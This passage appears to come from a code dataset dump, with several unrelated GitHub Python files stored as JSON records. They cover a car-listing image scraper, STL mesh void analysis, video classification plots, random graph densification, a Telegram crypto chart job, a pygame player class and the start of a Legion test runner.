\n\n writetojsonfile('./download/ml/' + str(marca).lower().replace(' ', '-') + '/' + str(ID) + '/', datos_vehiculo)\n\n print(\"Created meta.json\")\n\n '''get the links of the images of the current listing'''\n\n q = 0\n imagenes = []\n\n for i in range(0, len(soup.findAll('img'))):\n tag = soup.findAll('img')[i]\n if tag.get('data-srcset') is not None:\n image = tag.get('data-srcset').replace(' 2x', '').replace('webp', 'jpg')\n imagenes += [image]\n q = q + 1\n\n y = 0\n\n while y < q:\n try:\n urllib.request.urlretrieve(imagenes[y], './download/ml/' + str(marca).lower().replace(' ', '-') + '/' + str(ID) + '/' + str(marca).lower() + '_' + str(ID) + '_' + str(y + 1) + '.jpg')\n print(\"Downloaded image\", y + 1, \"of listing\", u + 1, \"of page\", j + 1)\n except Exception as e:\n print(str(e), imagenes[y])\n\n y = y + 1\n\nprint(\"End\")\n","repo_name":"antunezJoa/scriptml","sub_path":"ml3.py","file_name":"ml3.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"30702565759","text":"import numpy as np\nimport trimesh\nimport os\nimport sys\nfrom check import check\nimport gc \nimport argparse\nimport git\nimport time\nimport datetime \n\ntimes = []\n\ndef run(args,filepath,filename,report,d,failed,f):\n d+=1\n report.append('')\n start_time = time.time()\n #t = datetime.timedelta(seconds=time.time())\n # get total seconds?\n report,d,failed = check(args,filepath,filename,report,d,failed)\n print(report[d],file=f)\n gc.collect()\n #t.seconds-=time.time()\n #times.append(t.total_seconds())\n times.append((time.time()-start_time))\n return d\n\nparser = argparse.ArgumentParser(prog=\"analysis.py\",\n description=\"Detects if voids are present in given STL files\",\n )\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-d','--directory',help=\"specify directory to analyze\",action='store_true')\ngroup.add_argument('-f','--file',help=\"specify file to analyze\",action='store_true')\nparser.add_argument('filenameOrPath',action='store')\nparser.add_argument('-i','--info',help=\"provide amount of void in each shell (longer report)\",action='store_true')\nargs = parser.parse_args()\n\nif args.directory:\n filepath = args.filenameOrPath\nif args.file:\n filename = args.filenameOrPath\n\n# setup report string\nif args.info:\n report = ['file,num_shells,shell_num,shell_amt_void,enclosures,has_hidden_void,void_num,center_mass,bounds']\nelif not args.info:\n report = ['file,has_hidden_void,void_num,center_mass,bounds,Risk Factor'] \nfailed=[]\n# d for design number\nvf=input('running on v or f data set? 
')\n lim = int(input('please provide input limit for data set: '))\n\nd=0\nf=open(f'report_{vf}_{lim}.csv','w')\nprint(report[d],file=f)\nif args.directory:\n # if filepath=='STL-3D-CAD-dataset':\n # https://stackoverflow.com/a/15315667\n # g = git.cmd.Git(filepath)\n # g.pull()\n # https://stackoverflow.com/a/53432676\n for filename in os.listdir(filepath):\n if filename.lower().endswith('.stl'): # .lower() because .STL is possible\n d=run(args,filepath,filename,report,d,failed,f)\n print(\"done\")\n\nif args.file:\n d=run(args,None,filename,report,d,failed,f)\n print(\"done\")\n\nf.close()\nt=open(f'times_{vf}_{lim}.csv','w')\nfor time in times:\n print(str(time),file=t)\nt.close()\n","repo_name":"chamathg21/STL-3D-CAD-dataset","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10302520361","text":"\"\"\"\nThis moduel contains all the plots produced from the package.\n\"\"\"\nimport argparse\nimport os\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport torch\nfrom sklearn.metrics import confusion_matrix\nfrom tqdm import tqdm\nimport cv2\nimport pandas as pd\nfrom e2evideo import our_utils\n\n\ndevice = our_utils.get_device()\n\n\ndef plot_cae_training(data, network, color_channels=3):\n \"\"\"\n Plot the CAE training results, it results in plotting the original Vs.\n reconstruced image.\n \"\"\"\n video_number = 0\n for visual_images in tqdm(data):\n frame_number = 0\n # sending test images to device\n visual_images = visual_images.to(device)\n visual_images = visual_images.squeeze(axis=0)\n print(visual_images.shape)\n with torch.no_grad():\n # reconstructing test images\n reconstructed_imgs = network(visual_images)\n print(reconstructed_imgs.shape)\n # sending reconstructed and images to cpu to allow for visualization\n reconstructed_imgs = reconstructed_imgs.cpu()\n visual_images = visual_images.cpu()\n # plotting original and reconstructed images\n for image_o, image_r in zip(visual_images, reconstructed_imgs):\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.suptitle(\"Original/Reconstructed\")\n if color_channels == 1:\n ax2.imshow(image_r.reshape(60, 60, color_channels), cmap=\"gray\")\n else:\n ax2.imshow(image_r.reshape(60, 60, color_channels))\n ax1.imshow(image_o.squeeze())\n for ax_ in [ax1, ax2]:\n ax_.axis(\"off\")\n path_ = \"./results/feature_extractor/cae_\"\n file_name = path_ + str(video_number) + \"-\" + str(frame_number) + \".jpg\"\n frame_number += 1\n plt.savefig(file_name)\n plt.show()\n plt.close()\n video_number += 1\n break\n\n\ndef plot_ucf101(label_data):\n \"\"\"\n This function is used to plot the UCF101 dataset.\n \"\"\"\n # Create a Matplotlib figure\n plt.figure(figsize=(30, 30))\n\n # Get Names of all classes in UCF101\n all_classes_names = label_data.labels.values\n\n # Generate a random sample of images each time the cell runs\n random_range = random.sample(range(len(all_classes_names[0:10])), 8)\n\n # Iterating through all the random samples\n for counter, random_index in enumerate(random_range, 1):\n # Getting Class Name using Random Index\n selected_class_name = all_classes_names[random_index]\n\n # Getting a list of all the video files present in a Class Directory\n video_files_names_list = os.listdir(f\"../data/UCF-101/{selected_class_name}\")\n\n # Randomly selecting a video file\n selected_video_file_name = random.choice(video_files_names_list)\n\n # Reading the Video 
File Using the Video Capture\n video_file = f\"../data/UCF-101/{selected_class_name}/{selected_video_file_name}\"\n # pylint: disable=no-member\n video_reader = cv2.VideoCapture(video_file)\n # Reading The First Frame of the Video File\n _, bgr_frame = video_reader.read()\n\n # Closing the VideoCapture object and releasing all resources.\n video_reader.release()\n\n # Converting the BGR Frame to RGB Frame\n rgb_frame = cv2.cvtColor(bgr_frame, cv2.COLOR_BGR2RGB)\n\n # Adding The Class Name Text on top of the Video Frame.\n\n cv2.rectangle(rgb_frame, (30, 200), (290, 240), (255, 255, 255), -1)\n cv2.putText(\n rgb_frame,\n selected_class_name,\n (30, 230),\n cv2.FONT_HERSHEY_SIMPLEX,\n 1,\n (160, 32, 240),\n 2,\n cv2.LINE_AA,\n )\n cv2.rectangle(rgb_frame, (1, 1), (320, 240), (160, 32, 240), 10)\n # Assigning the Frame to a specific position of a subplot\n plt.subplot(5, 4, counter)\n plt.imshow(rgb_frame)\n plt.axis(\"off\")\n # save image to a file\n plt.savefig(\"./results/ucf101.jpg\")\n print(\"image saved to file\")\n\n\ndef plot_accuracy(history):\n \"\"\"\n This function is used to plot the accuracy of the model.\n \"\"\"\n # Plot the graph to check training and testing accuracy over the period of time\n plt.figure(figsize=(13, 5))\n plt.title(\"Accuracy vs Epochs\")\n plt.plot(history.history[\"accuracy\"], label=\"Train Accuracy\")\n plt.plot(history.history[\"val_accuracy\"], label=\"Validation Accuracy\")\n plt.legend(loc=\"best\")\n plt.savefig(\"./results/accuracy_vs_epochs.png\")\n plt.show()\n\n\ndef plot_confusion_matrix(y_test, predicted_classes):\n \"\"\"\n This function is used to plot the confusion matrix of the model.\n \"\"\"\n # Confusion Matrix\n plt.figure(figsize=(10, 10))\n plt.title(\"Confusion matrix\")\n cm_ = confusion_matrix(y_test, predicted_classes)\n sns.heatmap(cm_, annot=True, fmt=\"d\", cmap=\"coolwarm\")\n plt.savefig(\"./results/confusion_matrix.png\", bbox_inches=\"tight\")\n\n\ndef plot_predictions(test_images, predicted_classes, actual_classes):\n \"\"\"\n This function is used to plot the predictions of the model.\n \"\"\"\n # Create a Matplotlib figure\n plt.figure(figsize=(7, 7))\n counter = 1\n lables = [\n predicted_classes[i : i + 32] for i in range(0, len(predicted_classes), 32)\n ]\n actual_classes = [\n actual_classes[i : i + 32] for i in range(0, len(actual_classes), 32)\n ]\n print(\"\\n \\n\")\n print(\"Predicted Classes\")\n print(lables)\n print(\"\\n \\n\")\n print(\"Actual Classes\")\n print(actual_classes)\n print(\"\\n \\n\")\n\n label_data = pd.read_csv(\n \"../data/UCF-101/ucfTrainTestlist/classInd.txt\",\n sep=\" \",\n header=None,\n engine=\"pyarrow\",\n )\n label_data.columns = [\"index\", \"labels\"]\n\n for index, video in enumerate(test_images):\n frame = video[0, 0, :, :, :]\n plt.subplot(1, 3, counter)\n frame_resize = cv2.resize(frame, (60, 60)) # pylint: disable=no-member\n plt.imshow(frame_resize)\n plt.text(\n 10,\n 30,\n label_data.labels.values[lables[index][0]],\n style=\"italic\",\n bbox={\"facecolor\": \"purple\", \"alpha\": 0.7, \"pad\": 10},\n )\n plt.text(\n 10,\n 500,\n label_data.labels.values[actual_classes[index][0]],\n style=\"italic\",\n bbox={\"facecolor\": \"green\", \"alpha\": 0.7, \"pad\": 10},\n )\n counter += 1\n plt.axis(\"off\")\n plt.savefig(\"./results/predictions.jpg\", bbox_inches=\"tight\")\n print(\"\\n \\n\")\n print(\"Done\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--data_frame\")\n parser.add_argument(\"--nn\")\n 
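# note (editor): argparse yields these values as strings; cast color_channels to int before use, since plot_cae_training compares it to 1\n    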
parser.add_argument(\"--color_channels\")\n args = parser.parse_args()\n plot_cae_training(args.data_frame, args.nn, args.color_channels)\n","repo_name":"simulamet-host/video_analytics","sub_path":"e2evideo/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"32371433686","text":"\"\"\"\nWe wish to test for 'spaghetti-like' models of some kind, which are models with high node degree, lots of edges and non-linear\nbehavior. One way to do so is to randomly add (directed) edges to a given model G according to some simple constraints.\nEdges are added until the avg. node degree of the model reaches some parameter rho, a measure of model \"density\".\n\nThe constraints on adding edges aren't yet well understood according to any real world data. For instance, one might\nconstrain that edges only be added within local structures, only link upstream nodes to downstream ones (prevent loops),\netc. \n\nIdeas for spaghetti generation:\n1) view actual process data to observe what spaghetti procs look like, statistically\n2) add edges under a random distribution, but give higher edge probability to high degree/centrality nodes, to prefer the 20% in the 80/20 rule about worker productivity\n\nInput: A process graph with a START and an END node. The START and END node will not have out/in edges added to them, respectively,\nwhich is a constraint we could evaluate later. But IIRC, some of the traversal algorithms I wrote expect START to have no input edges,\nand END to have no outputs, so if we axe the constraint, I'll need to recheck those algs. Think of these vertices as Source and Sink in other\ngraph algs.\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport igraph\nimport random\n\n\"\"\"\nReturns average node degree of a graph g.\nNote this function doesn't care about the distribution of node degrees, only the global mean.\n\"\"\"\ndef _getAverageDegree(g):\n\treturn float(len(g.es)) / float(len(g.vs))\n\n\"\"\"\nAny finite graph has a maximum average degree (rho), defined by the maximum number of \ndirected edges for a graph of size n.\n\nIn such cases, the maximum average degree is given by (#maximumEdges(#nodes) / #nodes).\nWhere maximumEdges(g) for a directed graph g is given by n * (n - 1).\n\"\"\"\ndef _getMaxRho(g):\n\tnumNodes = float(len(g.vs))\n\tmaxEdges = numNodes * (numNodes - 1.0)\n\treturn maxEdges / numNodes\n\n\"\"\"\nSimply adds edges between random nodes in the graph until some \ndensity parameter is reach.\n\n@inputpath: Path to a graphml file.\n@outputPath: Path to which the new graph will be saved.\n@rho: A density parameter (here, the average node degree of the graph)\n\"\"\"\ndef Spaghettify(inputPath, outputPath, rho):\n\tif inputPath == outputPath:\n\t\tprint(\"ERROR inputPath==outputPath in Spaghettify()\")\n\t\treturn\n\n\tprint(\"Executing spaghetti on graph \"+inputPath+\". Output will be written to \"+outputPath+\".\")\n\n\ti = 0\n\tg = igraph.Graph.Read(inputPath)\n\tdensity = _getAverageDegree(g)\n\tprint(\"Input graph density: \"+str(density))\n\tmaxRho = _getMaxRho(g)\n\t#show the input graph\n\tigraph.plot(g)\n\t\n\t#if density < rho, then no changes will be made to the input graph\n\tif density < rho:\n\t\t#this case is perfectly valid, but ought to print something to notify the tester anyway\n\t\tprint(\"WARN density < rho in Spaghettify. 
Input graph \"+inputPath+\" will not be modified.\")\n\t\n\t#until density parameter is reached\n\twhile density < rho and density < maxRho:\n\t\t#add a random edge\n\t\t_addRandomEdge(g)\n\t\tdensity = _getAverageDegree(g)\n\t\ti+=1\n\t\tif i > 1000:\n\t\t\tprint(\"WARNING i > 1000 in Spaghettify(), may be running forever...\")\n\t\t\n\tg.write_graphml(outputPath)\n\tprint(\"Output graph density: \"+str(density))\n\tigraph.plot(g)\n\t\n\"\"\"\nAdds an edge between two random nodes.\nThere are no constraints on the structural characteristics of the edge, the selected nodes are purely random and non-equal.\n\"\"\"\ndef _addRandomEdge(g):\n\tnewEdge = False\n\ti = 0\n\t\n\twhile not newEdge:\n\t\t#select two nodes uniformly at random\n\t\tn1 = g.vs[random.randint(0, len(g.vs)-1)].index\n\t\tn2 = g.vs[random.randint(0, len(g.vs)-1)].index\n\t\twhile n1 == n2: #reselect if nodes are the same\n\t\t\tn2 = g.vs[random.randint(0, len(g.vs)-1)].index\n\t\t#make sure we're not adding out edges from END or in-edges to START\n\t\tif g.vs[n1][\"name\"] != \"END\" and g.vs[n2][\"name\"] != \"START\":\n\t\t\t#check if n1->n2 is a new edge\n\t\t\tnewEdge = (n1,n2) not in [(e.source, e.target) for e in g.es]\n\t\t\tif newEdge: #edge is new, so just add it\n\t\t\t\tg.add_edge(n1,n2)\n\t\t\tprint(str(i))\n\t\ti += 1\n\t\tif i > 1000:\n\t\t\tprint(\"WARNING i > 1000 in Spaghettify._addRandomEdge(), may be running forever...\")\n\t\t\ndef usage():\n\tprint(\"Usage: python ./SpaghettifyModel.py -input=[graphml path] -output=[output graphml path] -rho=[average node degree param]\")\n\nif len(sys.argv) < 4:\n\tprint(\"ERROR incorrect number of parameters passed to SpaghettifyModel.py\")\n\tusage()\n\texit()\n\ninputModel = sys.argv[1].split(\"-input=\")[1]\noutputModel = sys.argv[2].split(\"-output=\")[1]\nrho = float(sys.argv[3].split(\"-rho=\")[1])\n\nSpaghettify(inputModel, outputModel, rho)\n","repo_name":"niceyeti/PMTools","sub_path":"Testing/SpaghettifyModel.py","file_name":"SpaghettifyModel.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"30764901214","text":"from io import BytesIO\nfrom datetime import datetime\n\nfrom telegram.ext import CallbackContext\n\nfrom pycoingecko import CoinGeckoAPI\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import ConciseDateConverter\nimport matplotlib.units as munits\n\ncg = CoinGeckoAPI()\n\n# >> Setup Matplotlib\n\n# Use Agg which supports server side rendering\nmatplotlib.use('Agg')\n\n# Convert the units shown for datetimes\n# Stolen from: https://matplotlib.org/stable/gallery/ticks/date_concise_formatter.html\nformats = ['%y', '%b', '%d', '%H:%M', '%H:%M', '%S.%f']\nzero_formats = [''] + formats[:-1]\nzero_formats[3] = '%d-%b'\noffset_formats = ['', '%Y', '%b %Y', '%d %b %Y', '%d %b %Y', '%d %b %Y %H:%M']\nconverter = ConciseDateConverter(\n formats=formats,\n zero_formats=zero_formats,\n offset_formats=offset_formats\n)\nmunits.registry[datetime] = converter\n\n# >> The job\n\n\ndef daily(context: CallbackContext) -> None:\n chat_id = context.job.context[\"chat_id\"]\n chat = context.bot_data[\"chats\"][chat_id]\n\n # Extract the parameters\n id = chat[\"id\"]\n vs_currency = chat[\"vs_currency\"]\n amount = chat[\"amount\"]\n\n # Get history from coingecko\n history = cg.get_coin_market_chart_by_id(\n id=id,\n vs_currency=vs_currency,\n days=1\n )\n prices = history[\"prices\"]\n ts, price = zip(*prices)\n\n # Transform the 
series\n    ts = [datetime.utcfromtimestamp(t/1000) for t in ts]\n    price = [amount * p for p in price]\n\n    # Make plot\n    fig, ax = plt.subplots()\n    ax.plot(ts, price)\n    ax.set(ylabel='amount (£)')\n    ax.grid()\n\n    # Save as png\n    plot_file = BytesIO()\n    fig.savefig(plot_file, format='png')\n    plot_file.seek(0)\n\n    # Send to chat\n    context.bot.send_photo(chat_id=chat_id, photo=plot_file)\n","repo_name":"Akeboshiwind/itrackcryptobot","sub_path":"itrackcryptobot/jobs/daily.py","file_name":"daily.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"27306717829","text":"S = input()\nend = len(S) - 1\n\n# number of leading 'a' characters\ncount = 0\nfor i in range(0, len(S)):\n    if S[i] != 'a':\n        count = i + 1\n        break\n\nfor i in reversed(range(0, len(S))):\n    if S[i] != 'a':\n        end = i\n        break\ntarget = S[0:min(end+count, len(S))]\n\nif target == target[::-1]:\n    print('Yes')\nelse:\n    print('No')","repo_name":"yuuLab/algorithms","sub_path":"atcoder/abc-200-249/237/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"20396966027","text":"'''\nUser controllable player\n'''\n\nimport os\nimport pygame\nfrom deploy import SiteDeployment\nfrom jackit.core import BLOCK_WIDTH, BLOCK_HEIGHT\nfrom jackit.core.patch import UserPatch\nfrom jackit.core.animation import SpriteStripAnimation\nfrom jackit.core import CustomEvent\nfrom jackit.core.actor import Actor\nfrom jackit.actors.enemy import Enemy\nfrom jackit.entities import CodeBlock, ExitBlock, DeathBlock,\\\n    DecryptionKey, Coin\n\nclass Player(Actor):\n    '''\n    User controlled player\n    '''\n\n    def __init__(self, game_engine, controls, spawn_point=(0, 0)):\n        run_jack = os.path.join(SiteDeployment.resource_path, \"sprites\", \"run_jack.bmp\")\n        stand_jack = os.path.join(SiteDeployment.resource_path, \"sprites\", \"stand_jack.bmp\")\n        jack_it = os.path.join(SiteDeployment.resource_path, \"sprites\", \"jack_it.bmp\")\n        jack_off = os.path.join(SiteDeployment.resource_path, \"sprites\", \"jack_off.bmp\")\n\n        self.stand_animation = SpriteStripAnimation(\n            stand_jack, (0, 0, 19, BLOCK_HEIGHT), 1, -1, False,\n            int(game_engine.config.framerate / 7)\n        )\n        self.run_animation = SpriteStripAnimation(\n            run_jack, (0, 0, 19, BLOCK_HEIGHT), 2, -1, True,\n            int(game_engine.config.framerate / 7)\n        )\n        self.run_left_animation = SpriteStripAnimation(\n            run_jack, (0, 0, 19, BLOCK_HEIGHT), 2, -1, True,\n            int(game_engine.config.framerate / 7), x_mirror=True\n        )\n\n        self.jackin_it = SpriteStripAnimation(\n            jack_it, (0, 0, BLOCK_WIDTH, BLOCK_HEIGHT), 10, -1, False,\n            int(game_engine.config.framerate / 7)\n        )\n\n        self.jackin_off = SpriteStripAnimation(\n            jack_off, (0, 0, BLOCK_WIDTH, BLOCK_HEIGHT), 8, -1, False,\n            int(game_engine.config.framerate / 7)\n        )\n\n        super(Player, self).__init__(\n            game_engine, 19, BLOCK_HEIGHT, spawn_point[0],\n            spawn_point[1], animation=self.stand_animation\n        )\n\n        self.controls = controls\n        self.use_patch = True # Use the UserPatch for player stats and player\n\n        # Current level points\n        self.level_points = 0\n\n        # List of items the player has\n        self.items = []\n\n        # List of stored code routines (so the player doesn't have to redo the\n        # code blocks every time)\n        self.stored_code = []\n\n        # True if the player is alive otherwise false\n        self.alive = True\n\n        # True if the player cannot be killed\n        self.invincible = False\n\n        # Whether the animations for 
jackin in or jackin off are running\n self.is_jackin_in = False\n self.is_jackin_off = False\n\n def update(self):\n super(Player, self).update()\n\n if self.is_jackin_in and self.animation.done():\n self.is_jackin_in = False\n if self.is_jackin_off and self.animation.done():\n self.is_jackin_off = False\n\n def stop(self):\n if self.is_jackin_in or self.is_jackin_off:\n return\n\n if self.horizontal_movement_action != self.stop:\n self.animation = self.stand_animation.iter()\n super(Player, self).stop()\n\n def go_left(self):\n if self.is_jackin_in or self.is_jackin_off:\n return\n\n if self.horizontal_movement_action != self.go_left:\n self.animation = self.run_left_animation.iter()\n super(Player, self).go_left()\n\n def go_right(self):\n if self.is_jackin_in or self.is_jackin_off:\n return\n\n if self.horizontal_movement_action != self.go_right:\n self.animation = self.run_animation.iter()\n super(Player, self).go_right()\n\n def has_key(self):\n '''\n Does the player have the decryption key?\n '''\n return any(isinstance(x, DecryptionKey) for x in self.items)\n\n def collide(self, change_x, change_y, sprite):\n '''\n Called on each collision\n '''\n collideable = super(Player, self).collide(change_x, change_y, sprite)\n\n if isinstance(sprite, Coin):\n self.collides_with.remove(sprite) # So we don't accidently grab it twice\n self.level_points += sprite.points\n self.game_engine.total_points += sprite.points\n pygame.event.post(pygame.event.Event(CustomEvent.KILL_SPRITE, {\"sprite\":sprite}))\n elif isinstance(sprite, DecryptionKey):\n self.collides_with.remove(sprite) # So we don't accidently grab it twice\n self.items.append(sprite)\n pygame.event.post(pygame.event.Event(CustomEvent.KILL_SPRITE, {\"sprite\":sprite}))\n for block in self.game_engine.current_level.code_blocks:\n block.locked = False\n elif isinstance(sprite, ExitBlock):\n self.items.clear()\n self.level_points = 0\n pygame.event.post(pygame.event.Event(CustomEvent.NEXT_LEVEL))\n elif isinstance(sprite, Enemy) or isinstance(sprite, DeathBlock):\n self.kill()\n\n return collideable\n\n def reset(self):\n '''\n Reset the player\n '''\n super(Player, self).reset()\n self.alive = True\n self.invincible = False\n\n def kill(self):\n '''\n Kill the player\n '''\n if not self.alive or self.invincible:\n return\n\n self.items.clear()\n self.items = []\n self.game_engine.total_points -= self.level_points\n self.level_points = 0\n\n self.alive = False\n super(Player, self).kill()\n\n def is_on_collideable(self):\n '''\n The rare chance that we land perfectly on an enemy and miss the call to collide\n '''\n ret = super(Player, self).is_on_collideable()\n if ret:\n for block in self.frame_cache[\"is_on_collideable\"]:\n if isinstance(block, Enemy) or isinstance(block, DeathBlock):\n pygame.event.post(pygame.event.Event(CustomEvent.KILL_SPRITE, {\"sprite\":self}))\n break\n return ret\n\n def collide_with(self, sprite):\n '''\n Some other sprite collided into us (we didn't collide into it)\n Happens when the other sprite is moving and this sprite is not\n '''\n if isinstance(sprite, Enemy):\n self.kill()\n\n def is_on_code_block(self):\n '''\n True if the Player is on a code block\n Uses frame cache to improve performance\n for subsequent calls\n '''\n if self.frame_cache.get(\"is_on_code_block\", None) is not None:\n return True\n\n if not self.is_on_interactable():\n return False\n\n for interactable in self.frame_cache[\"is_on_interactable\"]:\n if isinstance(interactable, CodeBlock):\n self.frame_cache[\"is_on_code_block\"] = 
interactable\n return True # Level design should only allow player to be on one code block\n # at a time. If not, too bad, I'm ignoring any others.\n\n return False\n\n def is_on_interactable(self):\n '''\n True if Player is on an interactable entity\n uses frame cache to ensure subsequent calls\n are faster\n '''\n\n # Speed up calls to this method if used more than once per frame\n if self.frame_cache.get(\"is_on_interactable\", None) is not None:\n return True\n\n blocks_hit = self.spritecollide(\n self.game_engine.current_level.interactable_blocks,\n 0, 0,\n trigger_cb=False,\n only_collideable=False\n )\n\n self.frame_cache[\"is_on_interactable\"] = []\n for block in blocks_hit:\n if block.is_interactable():\n self.frame_cache[\"is_on_interactable\"].append(block)\n\n if len(self.frame_cache[\"is_on_interactable\"]) == 0:\n self.frame_cache[\"is_on_interactable\"] = None\n return False\n\n return True\n\n def handle_event(self, event, keys):\n '''\n Handle player events (like controls and stuff)\n @param event - Current event\n @param keys - List of keys currently pressed by key ID\n '''\n if event.type == pygame.KEYUP:\n if event.key == self.controls.left and not keys[self.controls.right]:\n self.stop()\n elif event.key == self.controls.right and not keys[self.controls.left]:\n self.stop()\n elif event.key == self.controls.jump:\n self.stop_jumping()\n elif event.type == pygame.KEYDOWN:\n if event.key == self.controls.reset_code:\n print(\"Resetting code block\")\n for block in self.game_engine.current_level.code_blocks:\n block.restore() # Put the initial challenge text back\n UserPatch.unpatch()\n elif event.key == self.controls.kill_self:\n print(\"Killing self!\")\n self.game_engine.hud.display_hint(\"You just killed yourself with 'K'. Worth it?\", 2)\n self.kill()\n return False\n elif event.key == self.controls.left:\n self.go_left()\n elif event.key == self.controls.right:\n self.go_right()\n elif event.key == self.controls.jump:\n self.jump()\n elif event.key == self.controls.interact and self.is_on_code_block():\n if self.frame_cache[\"is_on_code_block\"].is_locked() and not self.has_key():\n return True # Continue processing events\n\n print(self.frame_cache[\"is_on_code_block\"].is_locked())\n print(self.has_key())\n\n # Stop the player and put them over the interactable object\n # and make them invincible\n self.hard_stop()\n self.rect.left =\\\n (self.frame_cache[\"is_on_code_block\"].rect.left - (self.rect.width / 2))\n\n self.rect.bottom = self.frame_cache[\"is_on_code_block\"].rect.bottom\n\n # Interact with the object\n self.frame_cache[\"is_on_code_block\"].interact()\n\n return True # Continue processing events\n","repo_name":"vix597/jackit","sub_path":"jackit/actors/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"71915470169","text":"\"\"\" removes duplicate elements from a given list\n return new list without the duplication\n\nevery number will be checked, and see if it exists in the no_duplicate list,\nif doesn't exist, will be added to the list,\nif exists already, will be discarded\nwill print the list with every number occurring only once \n(hence duplicate removed)\n\"\"\"\nnums = [1, 3, 67, 89, 1, 3, 45, 66]\nprint('Given list: ', nums)\n\ndef remove_dup(nums):\n no_duplicate = [] # every number stored here will occur once\n\n for i in nums:\n if i not in no_duplicate: # if the current count_item is not in the list, 
USE not in INSTEAD OF !=\n no_duplicate.append(i) # add the count_item to the list\n return no_duplicate # will output thr new list with no duplicates\n\n\nprint('After removing the duplicate numbers: ',remove_dup(nums))\n\n\n\n# using SET method\nnums1 = [1, 3, 67, 89, 1, 3, 45, 66]\nprint('Given list: ', nums1)\n\nnums1_set = set(nums1) # making a SET\nprint('Unique SET of numbers: ', nums1_set) # prints the SET (no duplicates)\nnums1_set_to_list = list(nums1_set) # converting from SET to list\nprint('Unique LIST of numbers: ',nums1_set_to_list) # prints the list with no duplicates/unique numbers\n","repo_name":"oboniA/Data-Structure-and-Algorithms","sub_path":"LIST/Exercises/Removing techniques/removes dupliocate.py","file_name":"removes dupliocate.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34337215917","text":"from __future__ import print_function\nimport argparse, datetime, glob, json, multiprocessing, os, platform, shlex, shutil, subprocess, sys, traceback, tempfile\nimport signal\nfrom pathlib import Path\n\nmake_exe = os.environ.get('MAKE', 'make')\n\n# Find physical core count of the machine.\nif platform.system() == 'Linux':\n lines = subprocess.check_output(['lscpu', '--parse=core']).decode('utf-8')\n physical_cores = len(set(line for line in lines.strip().split('\\n')\n if not line.startswith('#')))\nelif platform.system() == 'Darwin':\n physical_cores = int(\n subprocess.check_output(['sysctl', '-n', 'hw.physicalcpu']).decode('utf-8'))\nelif platform.system() == 'FreeBSD':\n physical_cores = int(\n subprocess.check_output(['sysctl', '-n', 'hw.ncpu']).decode('utf-8'))\n make_exe = os.environ.get('MAKE', 'gmake') # default needs to be GNU make\nelse:\n raise Exception('Unknown platform: %s' % platform.system())\n\n# Choose a reasonable number of application cores given the\n# available physical cores.\napp_cores = max(physical_cores - 2, 1)\n\nlegion_cxx_tests = [\n # Tutorial\n ['tutorial/00_hello_world/hello_world', []],\n ['tutorial/01_tasks_and_futures/tasks_and_futures', []],\n ['tutorial/02_index_tasks/index_tasks', []],\n ['tutorial/03_global_vars/global_vars', []],\n ['tutorial/04_logical_regions/logical_regions', []],\n ['tutorial/05_physical_regions/physical_regions', []],\n ['tutorial/06_privileges/privileges', []],\n ['tutorial/07_partitioning/partitioning', []],\n ['tutorial/08_multiple_partitions/multiple_partitions', []],\n ['tutorial/09_custom_mapper/custom_mapper', []],\n\n # Examples\n ['examples/circuit/circuit', []],\n ['examples/dynamic_registration/dynamic_registration', []],\n ['examples/ghost/ghost', ['-ll:cpu', '4']],\n ['examples/ghost_pull/ghost_pull', ['-ll:cpu', '4']],\n ['examples/realm_saxpy/realm_saxpy', []],\n ['examples/realm_stencil/realm_stencil', ['-ll:cpu', '4']],\n ['examples/spmd_cgsolver/spmd_cgsolver', ['-ll:cpu', '4', '-perproc']],\n ['examples/virtual_map/virtual_map', []],\n ['examples/attach_2darray_c_fortran_layout/attach_2darray', []],\n ['examples/attach_array_daxpy/attach_array_daxpy', []],\n ['examples/attach_index_space/index_space_attach', []],\n ['examples/predication/predication', []],\n ['examples/layout_constraints/transpose', []],\n ['examples/padded_instances/padded_instances', []],\n ['examples/inline_tasks/inline_tasks', []],\n ['examples/local_function_tasks/local_function_tasks', []],\n ['examples/provenance/provenance', []],\n ['examples/tiling/tiling', []],\n ['examples/machine_config/machine_config', 
